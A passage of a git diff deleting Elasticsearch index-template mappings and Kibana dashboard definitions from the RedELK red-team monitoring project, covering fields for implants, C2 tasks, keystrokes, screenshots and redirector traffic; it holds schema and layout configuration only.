"ignore_above": 1024, - "type": "keyword" - }, - "full": { - "fields": { - "text": { - "norms": false, - "type": "text" - } - }, - "ignore_above": 1024, - "type": "keyword" - }, - "kernel": { - "ignore_above": 1024, - "type": "keyword" - }, - "name": { - "fields": { - "text": { - "norms": false, - "type": "text" - } - }, - "ignore_above": 1024, - "type": "keyword" - }, - "platform": { - "ignore_above": 1024, - "type": "keyword" - }, - "version": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "type": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "implant": { - "properties": { - "arch": { - "doc_values": true, - "eager_global_ordinals": false, - "index": true, - "index_options": "docs", - "norms": false, - "split_queries_on_whitespace": false, - "store": false, - "type": "keyword" - }, - "checkin": { - "type": "text" - }, - "child_id": { - "type": "text" - }, - "id": { - "type": "keyword" - }, - "input": { - "type": "text" - }, - "kill_date": { - "type": "text" - }, - "link_mode": { - "type": "keyword" - }, - "linked": { - "type": "boolean" - }, - "log_file": { - "type": "keyword" - }, - "operator": { - "type": "text" - }, - "output": { - "type": "text" - }, - "parent_id": { - "type": "keyword" - }, - "sleep": { - "type": "keyword" - }, - "task": { - "type": "keyword" - }, - "task_id": { - "type": "keyword" - }, - "task_parameters": { - "type": "keyword" - }, - "url": { - "type": "keyword" - } - }, - "type": "object" - }, - "infra": { - "properties": { - "attack_scenario": { - "doc_values": true, - "eager_global_ordinals": false, - "index": true, - "index_options": "docs", - "norms": false, - "split_queries_on_whitespace": false, - "store": false, - "type": "keyword" - }, - "log_type": { - "type": "keyword" - } - }, - "type": "object" - }, - "input": { - "properties": { - "type": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "ioc": { - "properties": { - "type": { - "type": "keyword" - } - }, - "type": "object" - }, - "keystrokes": { - "properties": { - "desktop_session": { - "doc_values": true, - "eager_global_ordinals": false, - "index": true, - "index_options": "docs", - "norms": false, - "split_queries_on_whitespace": false, - "store": false, - "type": "keyword" - }, - "url": { - "type": "keyword" - }, - "user": { - "type": "text" - } - }, - "type": "object" - }, - "log": { - "properties": { - "file": { - "properties": { - "path": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "flags": { - "ignore_above": 1024, - "type": "keyword" - }, - "level": { - "ignore_above": 1024, - "type": "keyword" - }, - "logger": { - "ignore_above": 1024, - "type": "keyword" - }, - "offset": { - "type": "long" - }, - "origin": { - "properties": { - "file": { - "properties": { - "line": { - "type": "long" - }, - "name": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "function": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "original": { - "ignore_above": 1024, - "type": "keyword" - }, - "source": { - "properties": { - "address": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "syslog": { - "properties": { - "facility": { - "properties": { - "code": { - "type": "long" - }, - "name": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "priority": { - "type": "long" - }, - "severity": { - "properties": { - "code": { - "type": "long" - }, - "name": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - } - }, - "type": "object" - } - }, - "type": "object" - }, - "message": { - "norms": false, - "type": "text" - }, - "process": { - "properties": { - "name": { - "fields": { - "text": { - "norms": false, - "type": "text" - } - }, - "ignore_above": 1024, - "type": "keyword" - }, - "pid": { - "type": "long" - } - }, - "type": "object" - }, - "screenshot": { - "properties": { - "desktop_session": { - "doc_values": true, - "eager_global_ordinals": false, - "index": true, - "index_options": "docs", - "norms": false, - "split_queries_on_whitespace": false, - "store": false, - "type": "keyword" - }, - "file_name": { - "type": "text" - }, - "full": { - "type": "keyword" - }, - "thumb": { - "type": "keyword" - }, - "title": { - "type": "text" - } - }, - "type": "object" - }, - "service": { - "properties": { - "name": { - "type": "keyword" - }, - "type": { - "type": "keyword" - } - }, - "type": "object" - }, - "tags": { - "ignore_above": 1024, - "type": "keyword" - }, - "threat": { - "properties": { - "framework": { - "ignore_above": 1024, - "type": "keyword" - }, - "tactic": { - "properties": { - "id": { - "ignore_above": 1024, - "type": "keyword" - }, - "name": { - "ignore_above": 1024, - "type": "keyword" - }, - "reference": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "technique": { - "properties": { - "id": { - "ignore_above": 1024, - "type": "keyword" - }, - "name": { - "fields": { - "text": { - "norms": false, - "type": "text" - } - }, - "ignore_above": 1024, - "type": "keyword" - }, - "reference": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - } - }, - "type": "object" - }, - "type": { - "type": "keyword" - }, - "user": { - "properties": { - "domain": { - "ignore_above": 1024, - "type": "keyword" - }, - "email": { - "ignore_above": 1024, - "type": "keyword" - }, - "hash": { - "ignore_above": 1024, - "type": "keyword" - }, - "id": { - "ignore_above": 1024, - "type": "keyword" - }, - "name": { - "type": "keyword" - } - }, - "type": "object" - } - } - }, - "order": 1, - "settings": { - "index": { - "mapping": { - "total_fields": { - "limit": "10000" - } - }, - "number_of_replicas": "0", - "number_of_shards": "1", - "query": { - "default_field": "*" - }, - "refresh_interval": "5s" - } - } -} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_dashboard.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_dashboard.ndjson deleted file mode 100644 index a14964ad..00000000 --- a/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_dashboard.ndjson +++ /dev/null @@ -1,12 +0,0 @@ -{"attributes": {"description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"93f74516-7d73-4db3-8d64-589dfd7492b7\"},\"panelIndex\":\"93f74516-7d73-4db3-8d64-589dfd7492b7\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_93f74516-7d73-4db3-8d64-589dfd7492b7\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":48,\"h\":2,\"i\":\"66e33663-63c3-4e78-aa5d-725e33754c02\"},\"panelIndex\":\"66e33663-63c3-4e78-aa5d-725e33754c02\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_66e33663-63c3-4e78-aa5d-725e33754c02\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":4,\"w\":8,\"h\":9,\"i\":\"800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3\"},\"panelIndex\":\"800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":8,\"y\":4,\"w\":8,\"h\":9,\"i\":\"86117a55-669e-4d4d-a4d6-436da4f1a930\"},\"panelIndex\":\"86117a55-669e-4d4d-a4d6-436da4f1a930\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_86117a55-669e-4d4d-a4d6-436da4f1a930\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":16,\"y\":4,\"w\":8,\"h\":9,\"i\":\"ab07bed8-9d4e-409c-b3db-d15124eb5467\"},\"panelIndex\":\"ab07bed8-9d4e-409c-b3db-d15124eb5467\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_ab07bed8-9d4e-409c-b3db-d15124eb5467\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":4,\"w\":8,\"h\":9,\"i\":\"019655aa-c9de-444a-a4af-619b7297572b\"},\"panelIndex\":\"019655aa-c9de-444a-a4af-619b7297572b\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_019655aa-c9de-444a-a4af-619b7297572b\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":32,\"y\":4,\"w\":16,\"h\":9,\"i\":\"43a0761e-49bc-4846-9956-04a604b063ec\"},\"panelIndex\":\"43a0761e-49bc-4846-9956-04a604b063ec\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_43a0761e-49bc-4846-9956-04a604b063ec\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":13,\"w\":8,\"h\":9,\"i\":\"eab2038d-128a-4b5b-8a72-701fd3f53bd8\"},\"panelIndex\":\"eab2038d-128a-4b5b-8a72-701fd3f53bd8\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_eab2038d-128a-4b5b-8a72-701fd3f53bd8\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":8,\"y\":13,\"w\":8,\"h\":9,\"i\":\"e18544fe-ac30-43cf-891c-4448ffea6bbd\"},\"panelIndex\":\"e18544fe-ac30-43cf-891c-4448ffea6bbd\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_e18544fe-ac30-43cf-891c-4448ffea6bbd\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":16,\"y\":13,\"w\":16,\"h\":9,\"i\":\"6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d\"},\"panelIndex\":\"6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Compromised realms\",\"panelRefName\":\"panel_6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":32,\"y\":13,\"w\":8,\"h\":9,\"i\":\"223951c1-7fe0-40f9-9a89-0c91aedd7fce\"},\"panelIndex\":\"223951c1-7fe0-40f9-9a89-0c91aedd7fce\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_223951c1-7fe0-40f9-9a89-0c91aedd7fce\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":40,\"y\":13,\"w\":8,\"h\":9,\"i\":\"c15dc2cd-fad3-44a3-b127-1cd47d837740\"},\"panelIndex\":\"c15dc2cd-fad3-44a3-b127-1cd47d837740\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_c15dc2cd-fad3-44a3-b127-1cd47d837740\"}]", "refreshInterval": {"pause": true, "value": 0}, "timeFrom": "now-12M", "timeRestore": true, "timeTo": "now", "title": "RedELK - Summary dashboard", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "02486040-d355-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "93f74516-7d73-4db3-8d64-589dfd7492b7:panel_93f74516-7d73-4db3-8d64-589dfd7492b7", "type": "visualization"}, {"id": "45491770-0886-11eb-a2d2-171dc8941414", "name": "66e33663-63c3-4e78-aa5d-725e33754c02:panel_66e33663-63c3-4e78-aa5d-725e33754c02", "type": "visualization"}, {"id": "b19d4790-d35f-11ea-9301-a30a04251ae9", "name": "800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3:panel_800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3", "type": "visualization"}, {"id": "dcf86190-d319-11ea-9301-a30a04251ae9", "name": "86117a55-669e-4d4d-a4d6-436da4f1a930:panel_86117a55-669e-4d4d-a4d6-436da4f1a930", "type": "visualization"}, {"id": "b5beb3c0-d04b-11ea-9301-a30a04251ae9", "name": "ab07bed8-9d4e-409c-b3db-d15124eb5467:panel_ab07bed8-9d4e-409c-b3db-d15124eb5467", "type": "visualization"}, {"id": "389dddc0-d317-11ea-9301-a30a04251ae9", "name": "019655aa-c9de-444a-a4af-619b7297572b:panel_019655aa-c9de-444a-a4af-619b7297572b", "type": "visualization"}, {"id": "ce581930-d361-11ea-9301-a30a04251ae9", "name": "43a0761e-49bc-4846-9956-04a604b063ec:panel_43a0761e-49bc-4846-9956-04a604b063ec", "type": "visualization"}, {"id": "57626ad0-d355-11ea-9301-a30a04251ae9", "name": "eab2038d-128a-4b5b-8a72-701fd3f53bd8:panel_eab2038d-128a-4b5b-8a72-701fd3f53bd8", "type": "visualization"}, {"id": "464660c0-d360-11ea-9301-a30a04251ae9", "name": "e18544fe-ac30-43cf-891c-4448ffea6bbd:panel_e18544fe-ac30-43cf-891c-4448ffea6bbd", "type": "visualization"}, {"id": "ff4497f0-d319-11ea-9301-a30a04251ae9", "name": "6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d:panel_6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d", "type": "visualization"}, {"id": "62b61920-d4e2-11ea-9301-a30a04251ae9", "name": "223951c1-7fe0-40f9-9a89-0c91aedd7fce:panel_223951c1-7fe0-40f9-9a89-0c91aedd7fce", "type": "visualization"}, {"id": "7d850b30-d4e2-11ea-9301-a30a04251ae9", "name": "c15dc2cd-fad3-44a3-b127-1cd47d837740:panel_c15dc2cd-fad3-44a3-b127-1cd47d837740", "type": "visualization"}], "sort": [1642171876916, 34], "type": "dashboard", "version": "1"} -{"attributes": {"description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"9af964d0-b9c5-4fa0-81d7-6e7cf9657757\"},\"panelIndex\":\"9af964d0-b9c5-4fa0-81d7-6e7cf9657757\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_9af964d0-b9c5-4fa0-81d7-6e7cf9657757\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":6,\"i\":\"09cb7bd6-8162-4141-8a0c-807ee57a4603\"},\"panelIndex\":\"09cb7bd6-8162-4141-8a0c-807ee57a4603\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Target host(s) and user(s) filter\",\"panelRefName\":\"panel_09cb7bd6-8162-4141-8a0c-807ee57a4603\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":12,\"h\":6,\"i\":\"fcd3a5bc-91d9-46a2-b08c-92958c5b6089\"},\"panelIndex\":\"fcd3a5bc-91d9-46a2-b08c-92958c5b6089\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Implants per host\",\"panelRefName\":\"panel_fcd3a5bc-91d9-46a2-b08c-92958c5b6089\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":36,\"y\":2,\"w\":12,\"h\":6,\"i\":\"47710d04-18f9-4563-bf0d-73b4dc24f9e5\"},\"panelIndex\":\"47710d04-18f9-4563-bf0d-73b4dc24f9e5\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Implants per user\",\"panelRefName\":\"panel_47710d04-18f9-4563-bf0d-73b4dc24f9e5\"},{\"version\":\"7.10.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":8,\"w\":48,\"h\":51,\"i\":\"30674424-d470-4b93-80c1-260d16f987ab\"},\"panelIndex\":\"30674424-d470-4b93-80c1-260d16f987ab\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_30674424-d470-4b93-80c1-260d16f987ab\"}]", "timeRestore": false, "title": "RedELK - Red Team Operations", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "04b87c50-d028-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "9af964d0-b9c5-4fa0-81d7-6e7cf9657757:panel_9af964d0-b9c5-4fa0-81d7-6e7cf9657757", "type": "visualization"}, {"id": "d2c7b720-d026-11ea-9301-a30a04251ae9", "name": "09cb7bd6-8162-4141-8a0c-807ee57a4603:panel_09cb7bd6-8162-4141-8a0c-807ee57a4603", "type": "visualization"}, {"id": "632081a0-d02a-11ea-9301-a30a04251ae9", "name": "fcd3a5bc-91d9-46a2-b08c-92958c5b6089:panel_fcd3a5bc-91d9-46a2-b08c-92958c5b6089", "type": "visualization"}, {"id": "6fcf1e70-d02a-11ea-9301-a30a04251ae9", "name": "47710d04-18f9-4563-bf0d-73b4dc24f9e5:panel_47710d04-18f9-4563-bf0d-73b4dc24f9e5", "type": "visualization"}, {"id": "1c580960-b6a9-11e8-bc1a-cf8fa3255855", "name": "30674424-d470-4b93-80c1-260d16f987ab:panel_30674424-d470-4b93-80c1-260d16f987ab", "type": "search"}], "sort": [1642171876916, 40], "type": "dashboard", "version": "1"} -{"attributes": {"description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"8f1a6a90-4b7e-47ef-aa74-a6037b7461e1\"},\"panelIndex\":\"8f1a6a90-4b7e-47ef-aa74-a6037b7461e1\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_8f1a6a90-4b7e-47ef-aa74-a6037b7461e1\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":9,\"i\":\"ecf77ead-e22f-4708-addf-0cbaaeb6fced\"},\"panelIndex\":\"ecf77ead-e22f-4708-addf-0cbaaeb6fced\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Techniques, Tactics and Procedures\",\"panelRefName\":\"panel_ecf77ead-e22f-4708-addf-0cbaaeb6fced\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":24,\"h\":18,\"i\":\"ff3f84bc-6c84-43fd-aa0f-19e5a91be826\"},\"panelIndex\":\"ff3f84bc-6c84-43fd-aa0f-19e5a91be826\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"C2 tasks per host and user\",\"panelRefName\":\"panel_ff3f84bc-6c84-43fd-aa0f-19e5a91be826\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":11,\"w\":24,\"h\":9,\"i\":\"23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e\"},\"panelIndex\":\"23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Cobalt Strike tasks per operator\",\"panelRefName\":\"panel_23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":20,\"w\":48,\"h\":14,\"i\":\"b038a84c-9db0-4266-af43-c8023da4781a\"},\"panelIndex\":\"b038a84c-9db0-4266-af43-c8023da4781a\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"C2 tasks\",\"panelRefName\":\"panel_b038a84c-9db0-4266-af43-c8023da4781a\"}]", "timeRestore": false, "title": "RedELK - Tasks", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "0523c8a0-d025-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "8f1a6a90-4b7e-47ef-aa74-a6037b7461e1:panel_8f1a6a90-4b7e-47ef-aa74-a6037b7461e1", "type": "visualization"}, {"id": "88db1280-d024-11ea-9301-a30a04251ae9", "name": "ecf77ead-e22f-4708-addf-0cbaaeb6fced:panel_ecf77ead-e22f-4708-addf-0cbaaeb6fced", "type": "visualization"}, {"id": "a5554e20-d025-11ea-9301-a30a04251ae9", "name": "ff3f84bc-6c84-43fd-aa0f-19e5a91be826:panel_ff3f84bc-6c84-43fd-aa0f-19e5a91be826", "type": "visualization"}, {"id": "afb6ce00-d022-11ea-9301-a30a04251ae9", "name": "23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e:panel_23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e", "type": "visualization"}, {"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "b038a84c-9db0-4266-af43-c8023da4781a:panel_b038a84c-9db0-4266-af43-c8023da4781a", "type": "search"}], "sort": [1642171876916, 46], "type": "dashboard", "version": "1"} -{"attributes": {"description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"lucene\",\"query\":\"\"},\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":true,\"key\":\"tags\",\"negate\":false,\"params\":{\"query\":\"iplist_redteam\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"tags\":\"iplist_redteam\"}}},{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":true,\"key\":\"tags\",\"negate\":false,\"params\":{\"query\":\"iplist_customer\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index\"},\"query\":{\"match_phrase\":{\"tags\":\"iplist_customer\"}}}]}"}, "optionsJSON": "{\"darkTheme\":false,\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":4,\"i\":\"948c1286-d4de-44a6-8fb2-95bf9252ed00\"},\"panelIndex\":\"948c1286-d4de-44a6-8fb2-95bf9252ed00\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_948c1286-d4de-44a6-8fb2-95bf9252ed00\"},{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":4,\"w\":36,\"h\":5,\"i\":\"ab9eb0fb-a164-4295-8177-865a2a67dccb\"},\"panelIndex\":\"ab9eb0fb-a164-4295-8177-865a2a67dccb\",\"embeddableConfig\":{\"hidePanelTitles\":false,\"enhancements\":{}},\"title\":\"Filters\",\"panelRefName\":\"panel_ab9eb0fb-a164-4295-8177-865a2a67dccb\"},{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":36,\"y\":4,\"w\":12,\"h\":5,\"i\":\"c630a33e-6a98-466d-8223-fd83e6947b8c\"},\"panelIndex\":\"c630a33e-6a98-466d-8223-fd83e6947b8c\",\"embeddableConfig\":{\"hidePanelTitles\":false,\"enhancements\":{},\"vis\":{\"legendOpen\":true}},\"title\":\"HTTP Redir traffic per backend\",\"panelRefName\":\"panel_c630a33e-6a98-466d-8223-fd83e6947b8c\"},{\"version\":\"7.16.3\",\"type\":\"map\",\"gridData\":{\"x\":0,\"y\":9,\"w\":24,\"h\":15,\"i\":\"1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a\"},\"panelIndex\":\"1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a\",\"embeddableConfig\":{\"hiddenLayers\":[],\"hidePanelTitles\":false,\"isLayerTOCOpen\":false,\"mapCenter\":{\"lat\":14.5701,\"lon\":121.0254,\"zoom\":17},\"openTOCDetails\":[],\"enhancements\":{}},\"title\":\"HTTP redir traffic map\",\"panelRefName\":\"panel_1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a\"},{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":9,\"w\":24,\"h\":15,\"i\":\"fc254327-57ac-4e5f-88f7-a32d48570289\"},\"panelIndex\":\"fc254327-57ac-4e5f-88f7-a32d48570289\",\"embeddableConfig\":{\"hidePanelTitles\":false,\"enhancements\":{}},\"title\":\"HTTP Redir traffic over time\",\"panelRefName\":\"panel_fc254327-57ac-4e5f-88f7-a32d48570289\"},{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":24,\"w\":24,\"h\":15,\"i\":\"829f61cf-9374-4bb5-8214-34e6875e79da\"},\"panelIndex\":\"829f61cf-9374-4bb5-8214-34e6875e79da\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_829f61cf-9374-4bb5-8214-34e6875e79da\"},{\"version\":\"7.16.3\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":39,\"w\":48,\"h\":22,\"i\":\"0bc5f60b-f940-451a-886b-edff3512d180\"},\"panelIndex\":\"0bc5f60b-f940-451a-886b-edff3512d180\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_0bc5f60b-f940-451a-886b-edff3512d180\"}]", "refreshInterval": {"pause": false, "value": 30000}, "timeFrom": "now-1d", "timeRestore": true, "timeTo": "now", "title": "RedELK - Traffic dashboard", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "0f8626d0-c6f4-11e8-a9c6-cd307b96b1ba", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}, {"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", "type": "index-pattern"}, {"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "948c1286-d4de-44a6-8fb2-95bf9252ed00:panel_948c1286-d4de-44a6-8fb2-95bf9252ed00", "type": "visualization"}, {"id": "56350050-efe7-11eb-8a9f-2572da287875", "name": "ab9eb0fb-a164-4295-8177-865a2a67dccb:panel_ab9eb0fb-a164-4295-8177-865a2a67dccb", "type": "visualization"}, {"id": "d625ba60-efe8-11eb-8a9f-2572da287875", "name": "c630a33e-6a98-466d-8223-fd83e6947b8c:panel_c630a33e-6a98-466d-8223-fd83e6947b8c", "type": "visualization"}, {"id": "dd9e9510-efec-11eb-8a9f-2572da287875", "name": "1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a:panel_1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a", "type": "map"}, {"id": "be08d380-efe9-11eb-8a9f-2572da287875", "name": "fc254327-57ac-4e5f-88f7-a32d48570289:panel_fc254327-57ac-4e5f-88f7-a32d48570289", "type": "visualization"}, {"id": "cbb7d710-efee-11eb-8a9f-2572da287875", "name": "829f61cf-9374-4bb5-8214-34e6875e79da:panel_829f61cf-9374-4bb5-8214-34e6875e79da", "type": "visualization"}, {"id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", "name": "0bc5f60b-f940-451a-886b-edff3512d180:panel_0bc5f60b-f940-451a-886b-edff3512d180", "type": "search"}], "sort": [1643016059071, 291], "type": "dashboard", "version": "1"} -{"attributes": {"description": "RedELK implants dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"lucene\",\"query\":\"\"},\"filter\":[{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"tags\",\"params\":{\"query\":\"sandboxes_v01\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"tags\":\"sandboxes_v01\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"tags\",\"params\":{\"query\":\"testsystems_v01\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index\"},\"query\":{\"match_phrase\":{\"tags\":\"testsystems_v01\"}},\"$state\":{\"store\":\"appState\"}}]}"}, "optionsJSON": "{\"darkTheme\":false,\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":15,\"i\":\"1\"},\"panelIndex\":\"1\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_1\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":24,\"h\":15,\"i\":\"2\"},\"panelIndex\":\"2\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_2\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":17,\"w\":24,\"h\":15,\"i\":\"3\"},\"panelIndex\":\"3\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_3\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":32,\"w\":48,\"h\":22,\"i\":\"4\"},\"panelIndex\":\"4\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_4\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":17,\"w\":24,\"h\":15,\"i\":\"5\"},\"panelIndex\":\"5\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_5\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"a5e43e90-aa23-403a-9167-bfe8aff7fb6c\"},\"panelIndex\":\"a5e43e90-aa23-403a-9167-bfe8aff7fb6c\",\